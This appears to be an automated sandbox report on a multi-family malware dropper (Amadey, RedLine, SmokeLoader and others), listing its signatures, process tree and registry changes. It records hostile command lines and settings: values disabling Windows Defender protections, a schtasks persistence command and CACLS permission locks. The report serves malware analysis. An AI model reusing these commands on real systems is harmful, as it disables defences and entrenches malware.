Malware Analysis Report

2025-01-23 08:48

Sample ID 231010-zcwzhabf45
Target file.exe
SHA256 f1fe205719d6a3d54daf0ce295917867a243cbaf4b52a25d605a9991249869c9
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

f1fe205719d6a3d54daf0ce295917867a243cbaf4b52a25d605a9991249869c9

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary


DcRat

Modifies Windows Defender Real-time Protection settings

Detect Mystic stealer payload

SmokeLoader

RedLine payload

Detects Healer an antivirus disabler dropper

Glupteba payload

Detected google phishing page

Glupteba

RedLine

Healer

SectopRAT payload

Mystic

Amadey

SectopRAT

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Loads dropped DLL

Windows security modification

Checks computer location settings

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:34

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-10-10 20:34
Reported: 2023-10-10 20:54
Platform: win7-20230831-en
Max time kernel: 159s
Max time network: 185s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Loads dropped DLL

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe | N/A | 3
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | N/A | 1
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A | 4
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\894C.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe | N/A | 1
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A | 3
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe | N/A | 1
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe | N/A | 1
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A568.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CD82.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A | 1
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A | 4
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CD82.exe | N/A | 4

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\894C.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2492 set thread context of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 596 set thread context of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F0BBCCD1-67AE-11EE-8909-FAA3B8E0C052} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F0D150A1-67AE-11EE-8909-FAA3B8E0C052} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A | 2
N/A | N/A | N/A | N/A | 62

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Count
Token: SeShutdownPrivilege | N/A | N/A | N/A | 7
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\A152.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | N/A | N/A | 7
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4458.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4C07.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\source1.exe | N/A | 1

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A
N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 3012 wrote to memory of 2308 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe | 7
PID 2308 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | 7
PID 2492 wrote to memory of 2664 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | 7
PID 2492 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | 10
PID 2492 wrote to memory of 2600 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe | C:\Windows\SysWOW64\WerFault.exe | 7
PID 1220 wrote to memory of 1996 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\894C.exe | 7
PID 1220 wrote to memory of 2768 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8AE2.exe | 4
PID 1996 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\894C.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe | 7
PID 2796 wrote to memory of 372 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe | 7
PID 372 wrote to memory of 1840 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe | 1

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 276

C:\Users\Admin\AppData\Local\Temp\894C.exe

C:\Users\Admin\AppData\Local\Temp\894C.exe

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 132

C:\Users\Admin\AppData\Local\Temp\8DA1.bat

"C:\Users\Admin\AppData\Local\Temp\8DA1.bat"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8ED7.tmp\8ED8.tmp\8EE9.bat C:\Users\Admin\AppData\Local\Temp\8DA1.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\90AE.exe

C:\Users\Admin\AppData\Local\Temp\90AE.exe

C:\Users\Admin\AppData\Local\Temp\A152.exe

C:\Users\Admin\AppData\Local\Temp\A152.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1528 CREDAT:340993 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 132

C:\Users\Admin\AppData\Local\Temp\A568.exe

C:\Users\Admin\AppData\Local\Temp\A568.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:820 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\CD82.exe

C:\Users\Admin\AppData\Local\Temp\CD82.exe

C:\Users\Admin\AppData\Local\Temp\2EE4.exe

C:\Users\Admin\AppData\Local\Temp\2EE4.exe

C:\Users\Admin\AppData\Local\Temp\4458.exe

C:\Users\Admin\AppData\Local\Temp\4458.exe

